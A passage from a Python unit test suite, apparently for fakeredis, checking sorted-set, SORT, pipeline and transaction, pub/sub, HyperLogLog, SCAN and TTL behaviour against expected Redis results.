self.assertEqual(self.redis.zremrangebyscore('foo', 0, 4), 2)
self.assertEqual(self.redis.zrange('foo', 0, -1), [])
def test_zremrangebyscore_exclusive(self):
self.redis.zadd('foo', zero=0)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', four=4)
self.assertEqual(self.redis.zremrangebyscore('foo', '(0', 1), 0)
self.assertEqual(self.redis.zrange('foo', 0, -1),
[b'zero', b'two', b'four'])
self.assertEqual(self.redis.zremrangebyscore('foo', '-inf', '(0'), 0)
self.assertEqual(self.redis.zrange('foo', 0, -1),
[b'zero', b'two', b'four'])
self.assertEqual(self.redis.zremrangebyscore('foo', '(2', 5), 1)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'zero', b'two'])
self.assertEqual(self.redis.zremrangebyscore('foo', 0, '(2'), 1)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'two'])
self.assertEqual(self.redis.zremrangebyscore('foo', '(1', '(3'), 1)
self.assertEqual(self.redis.zrange('foo', 0, -1), [])
def test_zremrangebyscore_raises_error(self):
self.redis.zadd('foo', zero=0)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', four=4)
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebyscore('foo', 'three', 1)
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebyscore('foo', 3, 'one')
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebyscore('foo', 3, '1)')
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebyscore('foo', '((3', '1)')
def test_zremrangebyscore_badkey(self):
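# Removing from a nonexistent key is a no-op and returns 0.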
self.assertEqual(self.redis.zremrangebyscore('foo', 0, 2), 0)
def test_zremrangebyscore_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebyscore('foo', 0, 2)
def test_zremrangebylex(self):
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', three_a=0)
self.assertEqual(self.redis.zremrangebylex('foo', b'(three_a', b'[two_b'), 2)
self.assertEqual(self.redis.zremrangebylex('foo', b'(three_a', b'[two_b'), 0)
self.assertEqual(self.redis.zremrangebylex('foo', b'-', b'(o'), 0)
self.assertEqual(self.redis.zremrangebylex('foo', b'-', b'[one_a'), 1)
self.assertEqual(self.redis.zremrangebylex('foo', b'[tw', b'+'), 0)
self.assertEqual(self.redis.zremrangebylex('foo', b'[t', b'+'), 1)
self.assertEqual(self.redis.zremrangebylex('foo', b'[t', b'+'), 0)
def test_zremrangebylex_error(self):
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', three_a=0)
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebylex('foo', b'(t', b'two_b')
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebylex('foo', b't', b'+')
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebylex('foo', b'[two_a', b'')
def test_zremrangebylex_badkey(self):
self.assertEqual(self.redis.zremrangebylex('foo', b'(three_a', b'[two_b'), 0)
def test_zremrangebylex_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebylex('foo', b'bar', b'baz')
def test_zunionstore(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('bar', one=1)
self.redis.zadd('bar', two=2)
self.redis.zadd('bar', three=3)
self.redis.zunionstore('baz', ['foo', 'bar'])
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 2), (b'three', 3), (b'two', 4)])
def test_zunionstore_sum(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('bar', one=1)
self.redis.zadd('bar', two=2)
self.redis.zadd('bar', three=3)
self.redis.zunionstore('baz', ['foo', 'bar'], aggregate='SUM')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 2), (b'three', 3), (b'two', 4)])
def test_zunionstore_max(self):
self.redis.zadd('foo', one=0)
self.redis.zadd('foo', two=0)
self.redis.zadd('bar', one=1)
self.redis.zadd('bar', two=2)
self.redis.zadd('bar', three=3)
self.redis.zunionstore('baz', ['foo', 'bar'], aggregate='MAX')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 1), (b'two', 2), (b'three', 3)])
def test_zunionstore_min(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('bar', one=0)
self.redis.zadd('bar', two=0)
self.redis.zadd('bar', three=3)
self.redis.zunionstore('baz', ['foo', 'bar'], aggregate='MIN')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 0), (b'two', 0), (b'three', 3)])
def test_zunionstore_weights(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('bar', one=1)
self.redis.zadd('bar', two=2)
self.redis.zadd('bar', four=4)
self.redis.zunionstore('baz', {'foo': 1, 'bar': 2}, aggregate='SUM')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 3), (b'two', 6), (b'four', 8)])
def test_zunionstore_mixed_set_types(self):
# Plain set members have no score, so redis treats each as 1.0.
self.redis.sadd('foo', 'one')
self.redis.sadd('foo', 'two')
self.redis.zadd('bar', one=1)
self.redis.zadd('bar', two=2)
self.redis.zadd('bar', three=3)
self.redis.zunionstore('baz', ['foo', 'bar'], aggregate='SUM')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 2), (b'three', 3), (b'two', 3)])
def test_zunionstore_badkey(self):
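# A nonexistent input key is treated as an empty sorted set.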
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zunionstore('baz', ['foo', 'bar'], aggregate='SUM')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 1), (b'two', 2)])
self.redis.zunionstore('baz', {'foo': 1, 'bar': 2}, aggregate='SUM')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 1), (b'two', 2)])
def test_zunionstore_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zunionstore('baz', ['foo', 'bar'])
def test_zinterstore(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('bar', one=1)
self.redis.zadd('bar', two=2)
self.redis.zadd('bar', three=3)
self.redis.zinterstore('baz', ['foo', 'bar'])
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 2), (b'two', 4)])
def test_zinterstore_mixed_set_types(self):
self.redis.sadd('foo', 'one')
self.redis.sadd('foo', 'two')
self.redis.zadd('bar', one=1)
self.redis.zadd('bar', two=2)
self.redis.zadd('bar', three=3)
self.redis.zinterstore('baz', ['foo', 'bar'], aggregate='SUM')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 2), (b'two', 3)])
def test_zinterstore_max(self):
self.redis.zadd('foo', one=0)
self.redis.zadd('foo', two=0)
self.redis.zadd('bar', one=1)
self.redis.zadd('bar', two=2)
self.redis.zadd('bar', three=3)
self.redis.zinterstore('baz', ['foo', 'bar'], aggregate='MAX')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 1), (b'two', 2)])
def test_zinterstore_onekey(self):
self.redis.zadd('foo', one=1)
self.redis.zinterstore('baz', ['foo'], aggregate='MAX')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 1)])
def test_zinterstore_nokey(self):
with self.assertRaises(redis.ResponseError):
self.redis.zinterstore('baz', [], aggregate='MAX')
def test_zunionstore_nokey(self):
with self.assertRaises(redis.ResponseError):
self.redis.zunionstore('baz', [], aggregate='MAX')
def test_zinterstore_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zinterstore('baz', ['foo', 'bar'])
def test_empty_zset(self):
self.redis.zadd('foo', one=1)
self.redis.zrem('foo', 'one')
self.assertFalse(self.redis.exists('foo'))
def test_multidb(self):
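# Keys are isolated per database, and flushall clears every database.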
r1 = self.create_redis(db=0)
r2 = self.create_redis(db=1)
r1['r1'] = 'r1'
r2['r2'] = 'r2'
self.assertTrue('r2' not in r1)
self.assertTrue('r1' not in r2)
self.assertEqual(r1['r1'], b'r1')
self.assertEqual(r2['r2'], b'r2')
self.assertEqual(r1.flushall(), True)
self.assertTrue('r1' not in r1)
self.assertTrue('r2' not in r2)
def test_basic_sort(self):
self.redis.rpush('foo', '2')
self.redis.rpush('foo', '1')
self.redis.rpush('foo', '3')
self.assertEqual(self.redis.sort('foo'), [b'1', b'2', b'3'])
def test_empty_sort(self):
self.assertEqual(self.redis.sort('foo'), [])
def test_sort_range_offset_range(self):
self.redis.rpush('foo', '2')
self.redis.rpush('foo', '1')
self.redis.rpush('foo', '4')
self.redis.rpush('foo', '3')
self.assertEqual(self.redis.sort('foo', start=0, num=2), [b'1', b'2'])
def test_sort_range_offset_range_and_desc(self):
self.redis.rpush('foo', '2')
self.redis.rpush('foo', '1')
self.redis.rpush('foo', '4')
self.redis.rpush('foo', '3')
self.assertEqual(self.redis.sort("foo", start=0, num=1, desc=True),
[b"4"])
def test_sort_range_offset_norange(self):
with self.assertRaises(redis.RedisError):
self.redis.sort('foo', start=1)
def test_sort_range_with_large_range(self):
self.redis.rpush('foo', '2')
self.redis.rpush('foo', '1')
self.redis.rpush('foo', '4')
self.redis.rpush('foo', '3')
# num=20 even though len(foo) is 4.
self.assertEqual(self.redis.sort('foo', start=1, num=20),
[b'2', b'3', b'4'])
def test_sort_descending(self):
self.redis.rpush('foo', '1')
self.redis.rpush('foo', '2')
self.redis.rpush('foo', '3')
self.assertEqual(self.redis.sort('foo', desc=True), [b'3', b'2', b'1'])
def test_sort_alpha(self):
self.redis.rpush('foo', '2a')
self.redis.rpush('foo', '1b')
self.redis.rpush('foo', '2b')
self.redis.rpush('foo', '1a')
self.assertEqual(self.redis.sort('foo', alpha=True),
[b'1a', b'1b', b'2a', b'2b'])
def test_sort_wrong_type(self):
self.redis.set('string', '3')
with self.assertRaises(redis.ResponseError):
self.redis.sort('string')
def test_sort_non_numeric_raises_error(self):
self.redis.rpush('foo', '2a')
self.redis.rpush('foo', '1b')
self.redis.rpush('foo', '2b')
self.redis.rpush('foo', '1a')
with self.assertRaises(redis.ResponseError):
self.redis.sort('foo', alpha=False)
def test_sort_with_store_option(self):
self.redis.rpush('foo', '2')
self.redis.rpush('foo', '1')
self.redis.rpush('foo', '4')
self.redis.rpush('foo', '3')
self.assertEqual(self.redis.sort('foo', store='bar'), 4)
self.assertEqual(self.redis.lrange('bar', 0, -1),
[b'1', b'2', b'3', b'4'])
def test_sort_with_by_and_get_option(self):
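# 'by' sorts using the external weight_* keys; 'get' substitutes each
# element into the given pattern(s), with '#' standing for the element
# itself.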
self.redis.rpush('foo', '2')
self.redis.rpush('foo', '1')
self.redis.rpush('foo', '4')
self.redis.rpush('foo', '3')
self.redis['weight_1'] = '4'
self.redis['weight_2'] = '3'
self.redis['weight_3'] = '2'
self.redis['weight_4'] = '1'
self.redis['data_1'] = 'one'
self.redis['data_2'] = 'two'
self.redis['data_3'] = 'three'
self.redis['data_4'] = 'four'
self.assertEqual(self.redis.sort('foo', by='weight_*', get='data_*'),
[b'four', b'three', b'two', b'one'])
self.assertEqual(self.redis.sort('foo', by='weight_*', get='#'),
[b'4', b'3', b'2', b'1'])
self.assertEqual(
self.redis.sort('foo', by='weight_*', get=('data_*', '#')),
[b'four', b'4', b'three', b'3', b'two', b'2', b'one', b'1'])
self.assertEqual(self.redis.sort('foo', by='weight_*', get='data_1'),
[None, None, None, None])
def test_sort_with_hash(self):
self.redis.rpush('foo', 'middle')
self.redis.rpush('foo', 'eldest')
self.redis.rpush('foo', 'youngest')
self.redis.hset('record_youngest', 'age', 1)
self.redis.hset('record_youngest', 'name', 'baby')
self.redis.hset('record_middle', 'age', 10)
self.redis.hset('record_middle', 'name', 'teen')
self.redis.hset('record_eldest', 'age', 20)
self.redis.hset('record_eldest', 'name', 'adult')
self.assertEqual(self.redis.sort('foo', by='record_*->age'),
[b'youngest', b'middle', b'eldest'])
self.assertEqual(
self.redis.sort('foo', by='record_*->age', get='record_*->name'),
[b'baby', b'teen', b'adult'])
def test_sort_with_set(self):
self.redis.sadd('foo', '3')
self.redis.sadd('foo', '1')
self.redis.sadd('foo', '2')
self.assertEqual(self.redis.sort('foo'), [b'1', b'2', b'3'])
def test_pipeline(self):
# The pipeline method returns an object for
# issuing multiple commands in a batch.
p = self.redis.pipeline()
p.watch('bam')
p.multi()
p.set('foo', 'bar').get('foo')
p.lpush('baz', 'quux')
p.lpush('baz', 'quux2').lrange('baz', 0, -1)
res = p.execute()
# Check return values returned as list.
self.assertEqual(res, [True, b'bar', 1, 2, [b'quux2', b'quux']])
# Check side effects happened as expected.
self.assertEqual(self.redis.lrange('baz', 0, -1), [b'quux2', b'quux'])
# Check that the command buffer has been emptied.
self.assertEqual(p.execute(), [])
def test_pipeline_ignore_errors(self):
"""Test the pipeline ignoring errors when asked."""
with self.redis.pipeline() as p:
p.set('foo', 'bar')
p.rename('baz', 'bats')
with self.assertRaises(redis.exceptions.ResponseError):
p.execute()
self.assertEqual([], p.execute())
with self.redis.pipeline() as p:
p.set('foo', 'bar')
p.rename('baz', 'bats')
res = p.execute(raise_on_error=False)
self.assertEqual([], p.execute())
self.assertEqual(len(res), 2)
self.assertIsInstance(res[1], redis.exceptions.ResponseError)
def test_multiple_successful_watch_calls(self):
p = self.redis.pipeline()
p.watch('bam')
p.multi()
p.set('foo', 'bar')
# Check that the watched keys buffer has been emptied.
p.execute()
# bam is no longer being watched, so it's ok to modify
# it now.
p.watch('foo')
self.redis.set('bam', 'boo')
p.multi()
p.set('foo', 'bats')
self.assertEqual(p.execute(), [True])
def test_pipeline_non_transactional(self):
# For our simple-minded model there should be no observable
# difference between transactional and non-transactional pipelines.
p = self.redis.pipeline(transaction=False)
res = p.set('baz', 'quux').get('baz').execute()
self.assertEqual(res, [True, b'quux'])
def test_pipeline_raises_when_watched_key_changed(self):
self.redis.set('foo', 'bar')
self.redis.rpush('greet', 'hello')
p = self.redis.pipeline()
self.addCleanup(p.reset)
p.watch('greet', 'foo')
nextf = fakeredis.to_bytes(p.get('foo')) + b'baz'
# Simulate change happening on another thread.
self.redis.rpush('greet', 'world')
# Begin pipelining.
p.multi()
p.set('foo', nextf)
with self.assertRaises(redis.WatchError):
p.execute()
def test_pipeline_succeeds_despite_unwatched_key_changed(self):
# Same setup as before except for the params to the WATCH command.
self.redis.set('foo', 'bar')
self.redis.rpush('greet', 'hello')
p = self.redis.pipeline()
try:
# Only watch one of the 2 keys.
p.watch('foo')
nextf = fakeredis.to_bytes(p.get('foo')) + b'baz'
# Simulate change happening on another thread.
self.redis.rpush('greet', 'world')
p.multi()
p.set('foo', nextf)
p.execute()
# Check the commands were executed.
self.assertEqual(self.redis.get('foo'), b'barbaz')
finally:
p.reset()
def test_pipeline_succeeds_when_watching_nonexistent_key(self):
self.redis.set('foo', 'bar')
self.redis.rpush('greet', 'hello')
p = self.redis.pipeline()
try:
# Also watch a nonexistent key.
p.watch('foo', 'bam')
nextf = fakeredis.to_bytes(p.get('foo')) + b'baz'
# Simulate change happening on another thread.
self.redis.rpush('greet', 'world')
p.multi()
p.set('foo', nextf)
p.execute()
# Check the commands were executed.
self.assertEqual(self.redis.get('foo'), b'barbaz')
finally:
p.reset()
def test_watch_state_is_cleared_across_multiple_watches(self):
self.redis.set('foo', 'one')
self.redis.set('bar', 'baz')
p = self.redis.pipeline()
self.addCleanup(p.reset)
p.watch('foo')
# Simulate change happening on another thread.
self.redis.set('foo', 'three')
p.multi()
p.set('foo', 'three')
with self.assertRaises(redis.WatchError):
p.execute()
# Now watch another key. It should be ok to change
# foo as we're no longer watching it.
p.watch('bar')
self.redis.set('foo', 'four')
p.multi()
p.set('bar', 'five')
self.assertEqual(p.execute(), [True])
def test_pipeline_proxies_to_redis_object(self):
p = self.redis.pipeline()
self.assertTrue(hasattr(p, 'zadd'))
with self.assertRaises(AttributeError):
p.non_existent_attribute
def test_pipeline_as_context_manager(self):
self.redis.set('foo', 'bar')
with self.redis.pipeline() as p:
p.watch('foo')
self.assertTrue(isinstance(p, redis.client.BasePipeline)
or p.need_reset)
p.multi()
p.set('foo', 'baz')
p.execute()
# Usually you would consider the pipeline destroyed after the
# with statement, but we still need to check it was reset properly:
self.assertTrue(isinstance(p, redis.client.BasePipeline)
or not p.need_reset)
def test_pipeline_transaction_shortcut(self):
# This example is taken pretty much verbatim from the redis-py documentation.
self.redis.set('OUR-SEQUENCE-KEY', 13)
calls = []
def client_side_incr(pipe):
calls.append((pipe,))
current_value = pipe.get('OUR-SEQUENCE-KEY')
next_value = int(current_value) + 1
if len(calls) < 3:
# Simulate a change from another thread.
self.redis.set('OUR-SEQUENCE-KEY', next_value)
pipe.multi()
pipe.set('OUR-SEQUENCE-KEY', next_value)
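# transaction() retries the callable whenever a watched key changes
# underneath it (WatchError), so client_side_incr runs three times
# and the value goes from 13 to 16.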
res = self.redis.transaction(client_side_incr, 'OUR-SEQUENCE-KEY')
self.assertEqual([True], res)
self.assertEqual(16, int(self.redis.get('OUR-SEQUENCE-KEY')))
self.assertEqual(3, len(calls))
def test_pipeline_transaction_value_from_callable(self):
def callback(pipe):
# No need to do anything here since we only want the return value
return 'OUR-RETURN-VALUE'
res = self.redis.transaction(callback, 'OUR-SEQUENCE-KEY',
value_from_callable=True)
self.assertEqual('OUR-RETURN-VALUE', res)
def test_pipeline_empty(self):
p = self.redis.pipeline()
self.assertFalse(p)
def test_pipeline_length(self):
p = self.redis.pipeline()
p.set('baz', 'quux').get('baz')
self.assertEqual(2, len(p))
def test_key_patterns(self):
self.redis.mset({'one': 1, 'two': 2, 'three': 3, 'four': 4})
self.assertItemsEqual(self.redis.keys('*o*'),
[b'four', b'one', b'two'])
self.assertItemsEqual(self.redis.keys('t??'), [b'two'])
self.assertItemsEqual(self.redis.keys('*'),
[b'four', b'one', b'two', b'three'])
self.assertItemsEqual(self.redis.keys(),
[b'four', b'one', b'two', b'three'])
def test_ping(self):
self.assertTrue(self.redis.ping())
def test_type(self):
self.redis.set('string_key', "value")
self.redis.lpush("list_key", "value")
self.redis.sadd("set_key", "value")
self.redis.zadd("zset_key", 1, "value")
self.redis.hset('hset_key', 'key', 'value')
self.assertEqual(self.redis.type('string_key'), b'string')
self.assertEqual(self.redis.type('list_key'), b'list')
self.assertEqual(self.redis.type('set_key'), b'set')
self.assertEqual(self.redis.type('zset_key'), b'zset')
self.assertEqual(self.redis.type('hset_key'), b'hash')
self.assertEqual(self.redis.type('none_key'), b'none')
@attr('slow')
def test_pubsub_subscribe(self):
pubsub = self.redis.pubsub()
pubsub.subscribe("channel")
sleep(1)
expected_message = {'type': 'subscribe', 'pattern': None,
'channel': b'channel', 'data': 1}
message = pubsub.get_message()
keys = list(pubsub.channels.keys())
key = keys[0]
if not self.decode_responses:
key = (key if type(key) == bytes
else bytes(key, encoding='utf-8'))
self.assertEqual(len(keys), 1)
self.assertEqual(key, b'channel')
self.assertEqual(message, expected_message)
@attr('slow')
def test_pubsub_psubscribe(self):
pubsub = self.redis.pubsub()
pubsub.psubscribe("channel.*")
sleep(1)
expected_message = {'type': 'psubscribe', 'pattern': None,
'channel': b'channel.*', 'data': 1}
message = pubsub.get_message()
keys = list(pubsub.patterns.keys())
self.assertEqual(len(keys), 1)
self.assertEqual(message, expected_message)
@attr('slow')
def test_pubsub_unsubscribe(self):
pubsub = self.redis.pubsub()
pubsub.subscribe('channel-1', 'channel-2', 'channel-3')
sleep(1)
expected_message = {'type': 'unsubscribe', 'pattern': None,
'channel': b'channel-1', 'data': 2}
pubsub.get_message()
pubsub.get_message()
pubsub.get_message()
# unsubscribe from one
pubsub.unsubscribe('channel-1')
sleep(1)
message = pubsub.get_message()
keys = list(pubsub.channels.keys())
self.assertEqual(message, expected_message)
self.assertEqual(len(keys), 2)
# unsubscribe from multiple
pubsub.unsubscribe()
sleep(1)
pubsub.get_message()
pubsub.get_message()
keys = list(pubsub.channels.keys())
self.assertEqual(message, expected_message)
self.assertEqual(len(keys), 0)
@attr('slow')
def test_pubsub_punsubscribe(self):
pubsub = self.redis.pubsub()
pubsub.psubscribe('channel-1.*', 'channel-2.*', 'channel-3.*')
sleep(1)
expected_message = {'type': 'punsubscribe', 'pattern': None,
'channel': b'channel-1.*', 'data': 2}
pubsub.get_message()
pubsub.get_message()
pubsub.get_message()
# unsubscribe from one
pubsub.punsubscribe('channel-1.*')
sleep(1)
message = pubsub.get_message()
keys = list(pubsub.patterns.keys())
self.assertEqual(message, expected_message)
self.assertEqual(len(keys), 2)
# unsubscribe from multiple
pubsub.punsubscribe()
sleep(1)
pubsub.get_message()
pubsub.get_message()
keys = list(pubsub.patterns.keys())
self.assertEqual(len(keys), 0)
@attr('slow')
def test_pubsub_listen(self):
def _listen(pubsub, q):
count = 0
for message in pubsub.listen():
q.put(message)
count += 1
if count == 4:
pubsub.close()
channel = 'ch1'
patterns = ['ch1*', 'ch[1]', 'ch?']
pubsub = self.redis.pubsub()
pubsub.subscribe(channel)
pubsub.psubscribe(*patterns)
sleep(1)
msg1 = pubsub.get_message()
msg2 = pubsub.get_message()
msg3 = pubsub.get_message()
msg4 = pubsub.get_message()
self.assertEqual(msg1['type'], 'subscribe')
self.assertEqual(msg2['type'], 'psubscribe')
self.assertEqual(msg3['type'], 'psubscribe')
self.assertEqual(msg4['type'], 'psubscribe')
q = Queue()
t = threading.Thread(target=_listen, args=(pubsub, q))
t.start()
msg = 'hello world'
self.redis.publish(channel, msg)
t.join()
msg1 = q.get()
msg2 = q.get()
msg3 = q.get()
msg4 = q.get()
if self.decode_responses:
bpatterns = patterns + [channel]
else:
bpatterns = [pattern.encode() for pattern in patterns]
bpatterns.append(channel.encode())
msg = msg.encode()
self.assertEqual(msg1['data'], msg)
self.assertIn(msg1['channel'], bpatterns)
self.assertEqual(msg2['data'], msg)
self.assertIn(msg2['channel'], bpatterns)
self.assertEqual(msg3['data'], msg)
self.assertIn(msg3['channel'], bpatterns)
self.assertEqual(msg4['data'], msg)
self.assertIn(msg4['channel'], bpatterns)
@attr('slow')
def test_pubsub_listen_handler(self):
def _handler(message):
calls.append(message)
channel = 'ch1'
patterns = {'ch?': _handler}
calls = []
pubsub = self.redis.pubsub()
pubsub.subscribe(ch1=_handler)
pubsub.psubscribe(**patterns)
sleep(1)
msg1 = pubsub.get_message()
msg2 = pubsub.get_message()
self.assertEqual(msg1['type'], 'subscribe')
self.assertEqual(msg2['type'], 'psubscribe')
msg = 'hello world'
self.redis.publish(channel, msg)
sleep(1)
for i in range(2):
msg = pubsub.get_message()
self.assertIsNone(msg) # get_message returns None when handler is used
pubsub.close()
calls.sort(key=lambda call: call['type'])
self.assertEqual(calls, [
{'pattern': None, 'channel': b'ch1', 'data': b'hello world', 'type': 'message'},
{'pattern': b'ch?', 'channel': b'ch1', 'data': b'hello world', 'type': 'pmessage'}
])
@attr('slow')
def test_pubsub_ignore_sub_messages_listen(self):
def _listen(pubsub, q):
count = 0
for message in pubsub.listen():
q.put(message)
count += 1
if count == 4:
pubsub.close()
channel = 'ch1'
patterns = ['ch1*', 'ch[1]', 'ch?']
pubsub = self.redis.pubsub(ignore_subscribe_messages=True)
pubsub.subscribe(channel)
pubsub.psubscribe(*patterns)
sleep(1)
q = Queue()
t = threading.Thread(target=_listen, args=(pubsub, q))
t.start()
msg = 'hello world'
self.redis.publish(channel, msg)
t.join()
msg1 = q.get()
msg2 = q.get()
msg3 = q.get()
msg4 = q.get()
if self.decode_responses:
bpatterns = patterns + [channel]
else:
bpatterns = [pattern.encode() for pattern in patterns]
bpatterns.append(channel.encode())
msg = msg.encode()
self.assertEqual(msg1['data'], msg)
self.assertIn(msg1['channel'], bpatterns)
self.assertEqual(msg2['data'], msg)
self.assertIn(msg2['channel'], bpatterns)
self.assertEqual(msg3['data'], msg)
self.assertIn(msg3['channel'], bpatterns)
self.assertEqual(msg4['data'], msg)
self.assertIn(msg4['channel'], bpatterns)
@attr('slow')
def test_pubsub_binary(self):
if self.decode_responses:
# Reading the non-UTF-8 message will break if decoding
# responses.
return
def _listen(pubsub, q):
for message in pubsub.listen():
q.put(message)
pubsub.close()
pubsub = self.redis.pubsub(ignore_subscribe_messages=True)
pubsub.subscribe('channel\r\n\xff')
sleep(1)
q = Queue()
t = threading.Thread(target=_listen, args=(pubsub, q))
t.start()
msg = b'\x00hello world\r\n\xff'
self.redis.publish('channel\r\n\xff', msg)
t.join()
received = q.get()
self.assertEqual(received['data'], msg)
def test_pfadd(self):
key = "hll-pfadd"
self.assertEqual(
1, self.redis.pfadd(key, "a", "b", "c", "d", "e", "f", "g"))
self.assertEqual(7, self.redis.pfcount(key))
def test_pfcount(self):
key1 = "hll-pfcount01"
key2 = "hll-pfcount02"
key3 = "hll-pfcount03"
self.assertEqual(1, self.redis.pfadd(key1, "foo", "bar", "zap"))
self.assertEqual(0, self.redis.pfadd(key1, "zap", "zap", "zap"))
self.assertEqual(0, self.redis.pfadd(key1, "foo", "bar"))
self.assertEqual(3, self.redis.pfcount(key1))
self.assertEqual(1, self.redis.pfadd(key2, "1", "2", "3"))
self.assertEqual(3, self.redis.pfcount(key2))
self.assertEqual(6, self.redis.pfcount(key1, key2))
self.assertEqual(1, self.redis.pfadd(key3, "foo", "bar", "zip"))
self.assertEqual(3, self.redis.pfcount(key3))
self.assertEqual(4, self.redis.pfcount(key1, key3))
self.assertEqual(7, self.redis.pfcount(key1, key2, key3))
def test_pfmerge(self):
key1 = "hll-pfmerge01"
key2 = "hll-pfmerge02"
key3 = "hll-pfmerge03"
self.assertEqual(1, self.redis.pfadd(key1, "foo", "bar", "zap", "a"))
self.assertEqual(1, self.redis.pfadd(key2, "a", "b", "c", "foo"))
self.assertTrue(self.redis.pfmerge(key3, key1, key2))
self.assertEqual(6, self.redis.pfcount(key3))
def test_scan(self):
# Setup the data
for ix in range(20):
k = 'scan-test:%s' % ix
v = 'result:%s' % ix
self.redis.set(k, v)
expected = self.redis.keys()
self.assertEqual(20, len(expected)) # Ensure we know what we're testing
# Test that we page through the results and get everything out
results = []
cursor = '0'
while cursor != 0:
cursor, data = self.redis.scan(cursor, count=6)
results.extend(data)
self.assertSetEqual(set(expected), set(results))
# Now test that the MATCH functionality works
results = []
cursor = '0'
while cursor != 0:
cursor, data = self.redis.scan(cursor, match='*7', count=100)
results.extend(data)
self.assertIn(b'scan-test:7', results)
self.assertIn(b'scan-test:17', results)
self.assertEqual(2, len(results))
# Test the match on iterator
results = [r for r in self.redis.scan_iter(match='*7')]
self.assertIn(b'scan-test:7', results)
self.assertIn(b'scan-test:17', results)
self.assertEqual(2, len(results))
def test_sscan(self):
# Setup the data
name = 'sscan-test'
for ix in range(20):
k = 'sscan-test:%s' % ix
self.redis.sadd(name, k)
expected = self.redis.smembers(name)
self.assertEqual(20, len(expected)) # Ensure we know what we're testing
# Test that we page through the results and get everything out
results = []
cursor = '0'
while cursor != 0:
cursor, data = self.redis.sscan(name, cursor, count=6)
results.extend(data)
self.assertSetEqual(set(expected), set(results))
# Test the iterator version
results = [r for r in self.redis.sscan_iter(name, count=6)]
self.assertSetEqual(set(expected), set(results))
# Now test that the MATCH functionality works
results = []
cursor = '0'
while cursor != 0:
cursor, data = self.redis.sscan(name, cursor, match='*7', count=100)
results.extend(data)
self.assertIn(b'sscan-test:7', results)
self.assertIn(b'sscan-test:17', results)
self.assertEqual(2, len(results))
# Test the match on iterator
results = [r for r in self.redis.sscan_iter(name, match='*7')]
self.assertIn(b'sscan-test:7', results)
self.assertIn(b'sscan-test:17', results)
self.assertEqual(2, len(results))
def test_hscan(self):
# Setup the data
name = 'hscan-test'
for ix in range(20):
k = 'key:%s' % ix
v = 'result:%s' % ix
self.redis.hset(name, k, v)
expected = self.redis.hgetall(name)
self.assertEqual(20, len(expected)) # Ensure we know what we're testing
# Test that we page through the results and get everything out
results = {}
cursor = '0'
while cursor != 0:
cursor, data = self.redis.hscan(name, cursor, count=6)
results.update(data)
self.assertDictEqual(expected, results)
# Test the iterator version
results = {}
for key, val in self.redis.hscan_iter(name, count=6):
results[key] = val
self.assertDictEqual(expected, results)
# Now test that the MATCH functionality works
results = {}
cursor = '0'
while cursor != 0:
cursor, data = self.redis.hscan(name, cursor, match='*7', count=100)
results.update(data)
self.assertIn(b'key:7', results)
self.assertIn(b'key:17', results)
self.assertEqual(2, len(results))
# Test the match on iterator
results = {}
for key, val in self.redis.hscan_iter(name, match='*7'):
results[key] = val
self.assertIn(b'key:7', results)
self.assertIn(b'key:17', results)
self.assertEqual(2, len(results))
def test_ttl_should_return_minus_one_for_non_expiring_key(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.ttl('foo'), -1)
def test_ttl_should_return_minus_two_for_non_existent_key(self):
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.ttl('foo'), -2)
def test_pttl_should_return_minus_one_for_non_expiring_key(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.pttl('foo'), -1)
def test_pttl_should_return_minus_two_for_non_existent_key(self):
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.pttl('foo'), -2)
def test_persist(self):
self.redis.set('foo', 'bar', ex=20)
self.redis.persist('foo')
self.assertEqual(self.redis.ttl('foo'), -1)
def test_set_existing_key_persists(self):
self.redis.set('foo', 'bar', ex=20)
